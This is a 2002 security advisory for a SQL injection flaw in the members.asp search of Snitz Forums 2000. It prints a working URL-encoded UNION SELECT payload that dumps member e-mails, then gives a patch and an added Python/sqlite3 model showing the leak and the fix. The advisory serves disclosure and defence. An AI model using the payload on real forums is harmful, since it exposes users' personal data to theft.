From: acemi (acemi_5yahoo.com)
Date: Fri Apr 19 2002 - 16:06:46 CDT


    vulnerable
    ----------
    Product : Snitz Forums 2000
    Version :
    3.3
    3.3.01
    3.3.02
    3.3.03 (last stable version)
    Object : members.asp
    Class : Input validation error (remote SQL query manipulation vulnerability)
    Vendor-URL : http://forum.snitz.com/
    Vendor-Status : informed, not patched
    Remote-Exploit : yes


    Introduction
    ------------
    Snitz Forums 2000 is open source ASP-based web
    forum software. It runs on Microsoft Windows
    operating systems. A vulnerability exists in Snitz
    Forums 2000 which makes it possible for a malicious
    user to remotely manipulate the logic of SQL queries.
    As a result, it may be possible for attackers to view all
    data in the forum's database. This vulnerability can
    be exploited with a web browser.

    More Details
    ------------
    In the members.asp page, when listing members that match
    a search criterion, the input (M_NAME) is not checked for
    malicious content before it is placed in the SQL query. As a
    result, an attacker can append an extra SELECT statement to
    the query with UNION and view any data in the forum's
    database.


    Proof-of-concept
    ----------------
    Normally, to view the list of members whose member name
    starts with 'A', the members.asp page is called as follows:

    /members.asp?mode=search&M_NAME=A&initial=1&method=


    Use this link to view the vulnerability:

    /members.asp?mode=search&M_NAME=XXXX%25')%20UNION%20SELECT%20MEMBER_ID,%20M_STATUS,%20M_NAME%20%2B%20'/'%20%2B%20M_EMAIL%20%2B%20'/',%20M_LEVEL,%20M_EMAIL,%20M_COUNTRY,%20M_HOMEPAGE,%20M_ICQ,%20M_YAHOO,%20M_AIM,%20M_TITLE,%20M_POSTS,%20M_LASTPOSTDATE,%20M_LASTHEREDATE,%20M_DATE,%20M_STATE%20FROM%20FORUM_MEMBERS%20WHERE%20(M_NAME%20LIKE%20'&initial=1&method=

    In the returned list, the MEMBERNAME column will show
    MEMBERNAME/EMAIL/ instead, because the injected query
    substitutes M_NAME + '/' + M_EMAIL + '/' for that column.


    Temporary fix
    -------------
    To fix this bug, in members.asp, replace the
    following lines:

    ' Unpatched: M_NAME is taken from the request without any check
    SearchName = Request("M_NAME")
    if SearchName = "" then
        SearchName = Request.Form("M_NAME")
    end if


    with:

    ' Patched: only accept M_NAME if it passes IsValidString
    ' (defined in inc_functions.asp); otherwise SearchName stays empty
    if IsValidString(Request("M_NAME")) then
        SearchName = Request("M_NAME")
    end if

    if SearchName = "" then
        if IsValidString(Request.Form("M_NAME")) then
            SearchName = Request.Form("M_NAME")
        end if
    end if


    and in the function IsValidString(sValidate) in
    inc_functions.asp, replace the following line:

    sInvalidChars = "!#$%^&*()=+{}[]|\;:/?>,<"

    with (the single quote is added so that the string
    delimiter used by the injection is rejected as well):

    sInvalidChars = "!#$%^&*()=+{}[]|\;:/?>,<'"
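    As an added illustration (not part of this advisory or of the Snitz Forums code), the following Python/sqlite3 model reproduces the members.asp pattern described under More Details and the Temporary fix above: the name is concatenated into the LIKE clause, the UNION from the proof-of-concept (reduced to two columns to match the model's table) leaks the e-mail column, and applying an IsValidString-style check stops it. The port of IsValidString (reject input containing any character from sInvalidChars), the table layout, the sample rows and the parameter-bound query are assumptions of this example, not the project's code.

```python
# Added example (not from the advisory or the Snitz Forums code): a sqlite3
# model of the members.asp name search, the concatenated query the advisory
# describes, and the suggested fix. IsValidString's logic is an assumption
# (reject input containing any character of sInvalidChars); the table layout
# and rows are constructed and reduced to the columns the model needs.
import sqlite3
from urllib.parse import unquote

# sInvalidChars from inc_functions.asp, before and after the advisory's change.
INVALID_CHARS_BEFORE = "!#$%^&*()=+{}[]|\\;:/?>,<"
INVALID_CHARS_AFTER = INVALID_CHARS_BEFORE + "'"

# Constructed sample rows (not real forum data).
SAMPLE_MEMBERS = [
    (1, "Alice", "alice@example.invalid"),
    (2, "Adam", "adam@example.invalid"),
    (3, "O'Brien", "obrien@example.invalid"),
]


def open_db():
    """In-memory stand-in for the FORUM_MEMBERS table (assumed, reduced layout)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE FORUM_MEMBERS (MEMBER_ID INTEGER, M_NAME TEXT, M_EMAIL TEXT)")
    conn.executemany("INSERT INTO FORUM_MEMBERS VALUES (?, ?, ?)", SAMPLE_MEMBERS)
    return conn


def is_valid_string(value, invalid_chars=INVALID_CHARS_AFTER):
    """Assumed port of IsValidString: False if any blacklisted character appears."""
    return not any(ch in invalid_chars for ch in value)


def search_unpatched(conn, search_name):
    """Unpatched behaviour: M_NAME is concatenated straight into the LIKE clause."""
    sql = ("SELECT MEMBER_ID, M_NAME FROM FORUM_MEMBERS "
           "WHERE (M_NAME LIKE '" + search_name + "%')")
    return conn.execute(sql).fetchall()


def search_patched(conn, search_name):
    """Advisory's fix (validate first) plus parameter binding so the value is
    never interpreted as SQL text. Returns None when the input is rejected."""
    if not is_valid_string(search_name):
        return None
    sql = "SELECT MEMBER_ID, M_NAME FROM FORUM_MEMBERS WHERE (M_NAME LIKE ?)"
    return conn.execute(sql, (search_name + "%",)).fetchall()


# The advisory's M_NAME value, reduced to two UNION columns to fit this model.
PAYLOAD = unquote("XXXX%25')%20UNION%20SELECT%20MEMBER_ID,%20M_EMAIL"
                  "%20FROM%20FORUM_MEMBERS%20WHERE%20(M_NAME%20LIKE%20'")


def demo():
    """Run the model and return the observations as a dict."""
    conn = open_db()
    return {
        # normal search: names starting with 'A'
        "normal": search_unpatched(conn, "A"),
        # unpatched code: the UNION returns the e-mail column of every member
        "leak": search_unpatched(conn, PAYLOAD),
        # the original blacklist already contains %, (, ) and , so the decisive
        # part of the fix is that M_NAME is now checked at all
        "payload_rejected_before": not is_valid_string(PAYLOAD, INVALID_CHARS_BEFORE),
        "payload_rejected_after": not is_valid_string(PAYLOAD),
        # side effect of adding ' to the blacklist: legitimate names with an
        # apostrophe are now rejected too
        "apostrophe_name_before": is_valid_string("O'Brien", INVALID_CHARS_BEFORE),
        "apostrophe_name_after": is_valid_string("O'Brien"),
        # patched path rejects the payload before any SQL is built
        "patched": search_patched(conn, PAYLOAD),
        # a bound parameter handles the apostrophe correctly without a blacklist
        "bound_apostrophe": conn.execute(
            "SELECT MEMBER_ID, M_NAME FROM FORUM_MEMBERS WHERE (M_NAME LIKE ?)",
            ("O'Brien%",)).fetchall(),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

    Two things the model makes visible: the original sInvalidChars already contained %, ( ) and , so what actually closes the hole is that M_NAME is now passed through IsValidString at all; adding ' covers inputs that avoid those characters but also rejects legitimate names such as O'Brien, whereas binding the value as a query parameter handles both the payload and the apostrophe without maintaining a blacklist.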